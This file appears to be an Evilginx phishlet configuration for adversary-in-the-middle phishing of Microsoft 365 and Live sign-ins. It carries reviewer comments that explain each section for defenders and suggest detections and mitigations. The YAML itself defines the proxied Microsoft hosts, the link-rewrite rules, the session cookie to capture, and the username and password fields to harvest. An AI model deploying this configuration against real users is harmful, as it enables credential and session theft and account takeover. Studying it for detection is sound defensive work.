This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
# NOTE(review): the top-level keys used in this file (proxy_hosts,
# sub_filters, auth_tokens, credentials, landing_path) match the phishlet
# format of Evilginx 2.x, a reverse-proxy (adversary-in-the-middle, AiTM)
# phishing framework - confirm before relying on that attribution.
# The hosts named further down are Microsoft sign-in and Office 365
# endpoints, so read this file as a description of AiTM phishing against
# Microsoft accounts and as input for detections.
# The trailing ' | |' on every line appears to be table-cell residue from
# the page rendering, not part of the YAML; nesting indentation was also
# lost in the rendering.
# Author handle as published with the file.
author: '@ztx' | |
# Minimum version of the consuming tool that this file declares; quoted so
# that it stays a string.
min_ver: '2.2.0' | |
# Hostnames handled by the proxy. Each entry pairs a subdomain label
# (phish_sub) with the genuine label (orig_sub) under the genuine parent
# domain (domain); in all seven entries the two labels are the same.
# NOTE(review): presumably phish_sub is the label served under the
# operator's own domain - confirm against the consuming tool's docs.
# Flags as written: only the two 'login' entries (microsoftonline.com and
# live.com) set is_landing: true, and only outlook.office365.com sets
# session: false.
# Detection: the labels login, www, outlook, secure.aadcdn,
# browser.pipe.aria and r4.res appearing together under one parent domain
# that is not Microsoft-owned is a pattern worth hunting for in DNS logs,
# web-proxy logs and certificate-transparency data.
proxy_hosts: | |
- {phish_sub: 'login', orig_sub: 'login', domain: 'microsoftonline.com', session: true, is_landing: true} | |
- {phish_sub: 'login', orig_sub: 'login', domain: 'live.com', session: true, is_landing: true} | |
- {phish_sub: 'www', orig_sub: 'www', domain: 'office.com', session: true, is_landing: false} | |
- {phish_sub: 'outlook', orig_sub: 'outlook', domain: 'office365.com', session: false, is_landing: false} | |
- {phish_sub: 'secure.aadcdn', orig_sub: 'secure.aadcdn', domain: 'microsoftonline-p.com', session: true, is_landing: false} | |
- {phish_sub: 'browser.pipe.aria', orig_sub: 'browser.pipe.aria', domain: 'microsoft.com', session: true, is_landing: false} | |
- {phish_sub: 'r4.res', orig_sub: 'r4.res', domain: 'office365.com', session: true, is_landing: false} | |
# Response-body rewrite rules. Each rule names one upstream host
# (triggers_on, also split into orig_sub + domain), a search string, a
# replace string, and the MIME types it applies to; every rule here lists
# text/html, application/json and application/javascript.
# search and replace are textually identical in every rule.
# NOTE(review): the {hostname} placeholder is presumably expanded to a
# different host on each side by the consuming tool - confirm against its
# documentation.
# Defender takeaway, if that reading holds: absolute links inside the
# served pages are rewritten, so inspecting links within the page does not
# expose the proxy. The origin shown in the address bar, and origin-bound
# authenticators such as FIDO2/WebAuthn that check it automatically, are
# what distinguish the genuine site.
sub_filters: | |
- {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}/common/login', replace: 'https://{hostname}/common/login', mimes: ['text/html', 'application/json', 'application/javascript']} | |
- {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}/common/oauth2/authorize', replace: 'https://{hostname}/common/oauth2/authorize', mimes: ['text/html', 'application/json', 'application/javascript']} | |
- {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} | |
- {triggers_on: 'secure.aadcdn.microsoftonline-p.com', orig_sub: 'secure.aadcdn', domain: 'microsoftonline-p.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} | |
- {triggers_on: 'outlook.office365.com', orig_sub: 'outlook', domain: 'office365.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} | |
- {triggers_on: 'www.office.com', orig_sub: 'www', domain: 'office.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} | |
- {triggers_on: 'browser.pipe.aria.microsoft.com', orig_sub: 'browser.pipe.aria', domain: 'microsoft.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} | |
- {triggers_on: 'r4.res.office365.com', orig_sub: 'r4.res', domain: 'office365.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} | |
- {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'href="https://{hostname}/common/uxpreview/optout', replace: 'href="https://{hostname}/common/uxpreview/optout', mimes: ['text/html', 'application/json', 'application/javascript']} | |
- {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'href="https://{hostname}/common/reprocess', replace: 'href="https://{hostname}/common/reprocess', mimes: ['text/html', 'application/json', 'application/javascript']} | |
- {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'href="https://{hostname}/common/DeviceCodeStatus', replace: 'href="https://{hostname}/common/DeviceCodeStatus', mimes: ['text/html', 'application/json', 'application/javascript']} | |
- {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'href="https://{hostname}/common/GetCredentialType', replace: 'href="https://{hostname}/common/GetCredentialType', mimes: ['text/html', 'application/json', 'application/javascript']} | |
- {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: 'href="https://{hostname}/oauth20_authorize.srf', replace: 'href="https://{hostname}/oauth20_authorize.srf', mimes: ['text/html', 'application/json', 'application/javascript']} | |
# Cookies the consuming tool is told to collect, given as a cookie domain
# plus a list of cookie names (keys). One domain and one name are listed.
# NOTE(review): 'keys' presumably belongs inside the '- domain:' item; the
# nesting indentation was lost in this rendering.
# Defender takeaway: in AiTM phishing generally, cookies pass through the
# proxy after the sign-in has completed, including any one-time-code or
# push MFA step, so those MFA methods alone do not stop session theft.
# Mitigations are origin-bound authenticators (FIDO2/WebAuthn),
# conditional access tied to device compliance, and revoking sessions and
# refresh tokens - not only resetting the password - when a user reports
# having signed in on such a page.
auth_tokens: | |
- domain: '.microsoftonline.com' | |
keys: ['MSCC'] | |
# Form fields to record from requests: 'loginfmt' as the username and
# 'passwd' as the password, both of type 'post' and both matched with the
# catch-all pattern '(.*)'.
# NOTE(review): key/search/type are presumably children of username and
# password, which are children of credentials; the nesting indentation was
# lost in this rendering.
# Incident response: a password typed into a page served through a proxy
# configured like this should be treated as disclosed, even if the user
# abandoned the sign-in before completing MFA.
credentials: | |
username: | |
key: 'loginfmt' | |
search: '(.*)' | |
type: 'post' | |
password: | |
key: 'passwd' | |
search: '(.*)' | |
type: 'post' | |
# Path and query string used as the entry point: an OAuth2 / OpenID Connect
# authorize request (response_type=code+id_token, response_mode=form_post)
# whose redirect_uri is https://www.office.com/.
# The state and nonce values are fixed strings stored in the file rather
# than per-request values.
# Detection: '/common/oauth2/authorize' requested on a host that is not
# Microsoft-owned is a usable web-proxy / secure-web-gateway signature, and
# the fixed state and nonce strings can be matched the same way.
# NOTE(review): the client_id value should be what the identity provider
# records as the requesting application in sign-in logs, which gives a
# pivot when reviewing sign-ins from unexpected IP addresses - confirm
# against your tenant's logs.
landing_path: | |
- '/common/oauth2/authorize?client_id=4345a7b9-9a63-4910-a426-35363201d503&response_mode=form_post&response_type=code+id_token&scope=openid+profile&state=OpenIdConnect.AuthenticationProperties%3dQVP38VZWrKxBhMSr5V9mBZRcG6dmc9gxaQa9zOYCaWp0M-bLEQUIh73ToVQguasz4qX1-aMaahQst02SDHq-lVzFRyDxhh4FLGGzHT0_lb35xz8ETalM2fwH-Z2Mx-8L&nonce=636788589275218064.OGY5Mzg1NDktMTI2Yy00ODhmLWI3MDMtY2RjMDNkZWQ2MGI5ODRjNzhhN2UtZWZmYy00N2YxLWJiZTAtMTgxYmJkMmFiODM1&redirect_uri=https%3a%2f%2fwww.office.com%2f&ui_locales=en-US&mkt=en-US' |